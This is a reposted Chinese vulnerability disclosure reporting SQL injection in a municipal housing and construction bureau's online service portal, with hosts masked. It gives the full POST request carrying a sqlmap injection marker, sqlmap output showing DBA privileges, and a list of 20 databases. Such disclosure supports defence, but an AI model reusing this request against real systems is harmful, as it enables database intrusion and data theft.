神刀安全网

漏洞标题: 一个注入受牵连的某市住房和城乡建设局网上办事大厅

漏洞详情

披露状态:

2016-05-18: 细节已通知厂商并且等待厂商处理中
2016-05-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

入口:

code 区域
**.**.**.**/CreditPlatform/Pages/PingFenGS/ZongChengBaoGSYear.aspx

网上办事大厅:

code 区域
**.**.**.**/ZiboHuiYuanShenBao/

POST包:

code 区域
POST /CreditPlatform/Pages/PingFenGS/ZongChengBaoGSYear.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: **.**.**.**/CreditPlatform/Pages/PingFenGS/ZongChengBaoGSYear.aspx
X-Forwarded-For: 1..
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------172172203313378
Content-Length: 5589

-----------------------------172172203313378
Content-Disposition: form-data; name="__EVENTTARGET"


-----------------------------172172203313378
Content-Disposition: form-data; name="__EVENTARGUMENT"


-----------------------------172172203313378
Content-Disposition: form-data; name="__VIEWSTATE"

/wEPDwUGODQ1NDMxD2QWAmYPZBYCAgMPZBYCAgEPZBYCZg9kFgJmD2QWBgIJDxBkEBUFAAQyMDEyBDIwMTMEMjAxNAQyMDE1FQUABDIwMTIEMjAxMwQyMDE0BDIwMTUUKwMFZ2dnZ2dkZAILDzwrAAsBAA8WCB4JUGFnZUNvdW50AgEeCERhdGFLZXlzFhQFJGM1NTE2MzY4LWZjMjgtNGE2MC05ZTEyLTY4ODE3OTYzODNkZAUkMGIzMTc2MTEtNjcwZS00ZjY0LTlkZmYtNTI2YmU5MzQyOWIzBSRmODIxMDliZS0wOWZkLTRiYzktYTQ0MS01MmIzNDM1MDI1OTIFJGRjZWRkOTFhLTQ5ZjEtNDkwZC1hMjFmLWQ3NzQyYTE4MzAyOAUkY2U4OWE4NWMtYzUzNC00NDcxLWE4M2ItMGI1NWFkMWU5ZjNkBSQ4NzNmM2QxNi04ZDBmLTQ0MDUtYTAxNy1kMWY3NjU5MTFlY2MFJDJjZDM5YjUyLWI0YjEtNGQzNy04Y2MzLTUyMDM2NmQ4YWJlMgUkOThmZTkyODAtZjBkMC00ZTY5LTk1OGMtYzRhMzBjMjhhZjBhBSQzNGNhOTlhMy0zZTc1LTQ2NzUtODcyYi04YmU1YjMxODE5MzEFJGQwYjk3ZTAzLTc5NTItNDY1ZS1iZDQ5LWI5NzUxMDU3NWJkOAUkNmY4OWEwMTEtY2M2My00MGRhLTk0ZDktYmZmMDdlMjk3ZDdmBSRjZTQzZjBkNS0xYWY3LTQyNDktYjcwNC0wNzJjYmY2MjFmZDYFJGZlMWUxNjgwLWRmNTYtNDMxZi05NzYxLTljOTNkMzFlNzMwOQUkOGE5OTI2NjEtNTM3YS00MzEyLTgyNzAtMjczMGRlMTEzOTNhBSQyZWUzN2RkNS1lNWYwLTQ0ZTgtYmRiMS03NTY5ODI4YzFhMTAFJGZlM2QwMmE0LWU0Y2QtNGE3YS04NGMzLTMxOTNiMGUxNDFkOQUkNTA2ZTE4ZWEtNmRhYy00M2NhLTg1ZGUtYzBjNTI0MTNlMzAxBSRjMGUxODYzMi1jYTljLTQzMDgtODViZi0xN2I5MTBkOThlNzIFJDVlZTE0OGI0LTRmNTctNDYyYy04ZmY0LTIxNDQwNDFmMjNlYwUkOGMyMDhjZGMtMjEzNi00MWRlLTg0YWEtN2M0YjQ2ZGI1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
-----------------------------172172203313378
Content-Disposition: form-data; name="__EVENTVALIDATION"

/wEWCwK1voO+CQK4qt/MCQKplrXzCAKplrHzCAL3xK/fDALSzZfeDAKQmb6wCQLTjv3WAQLTjpG7CQLTjqWADgLTjrnlB1yIj+lapfWeTDgHzAPAK0VrHosQ
-----------------------------172172203313378
Content-Disposition: form-data; name="ctl00$MainContent$txtDanweiName"

ABCD1*
-----------------------------172172203313378
Content-Disposition: form-data; name="ctl00$MainContent$CBCorp$0"

on
-----------------------------172172203313378
Content-Disposition: form-data; name="ctl00$MainContent$btnOK"

??????′¢
-----------------------------172172203313378
Content-Disposition: form-data; name="ctl00$MainContent$dtbPingJiaDate"


-----------------------------172172203313378
Content-Disposition: form-data; name="ctl00$MainContent$yearDrop"

2015
-----------------------------172172203313378--

DBA权限:

code 区域
[02:34:12] [INFO] testing Microsoft SQL Server
[02:34:12] [INFO] confirming Microsoft SQL Server
[02:34:14] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[02:34:14] [INFO] testing if current user is DBA
current user is DBA: True
[02:34:14] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[02:34:14] [INFO] fetched data logged to text files under 'C:/Documents and Sett
ings/Administrator/.sqlmap/output/**.**.**.**'

漏洞证明:

20个库:

code 区域
available databases [20]:
[*] ArcGisSDE
[*] dxgxzz
[*] EpointFrame8_Monitor
[*] EpointFrame_ZBJS
[*] EpointNetoffice
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] rmgyzz
[*] sde
[*] stzxzz
[*] szhwzz
[*] tempdb
[*] yljzz
[*] ZiBoDaJianGuan
[*] ZiBoDJG_EpointSystemSupport
[*] ZiBoDJG_XZSP
[*] ZiBoZJZ

修复方案:

分开?过滤

版权声明:转载请注明来源 elevensec11@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 一个注入受牵连的某市住房和城乡建设局网上办事大厅

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址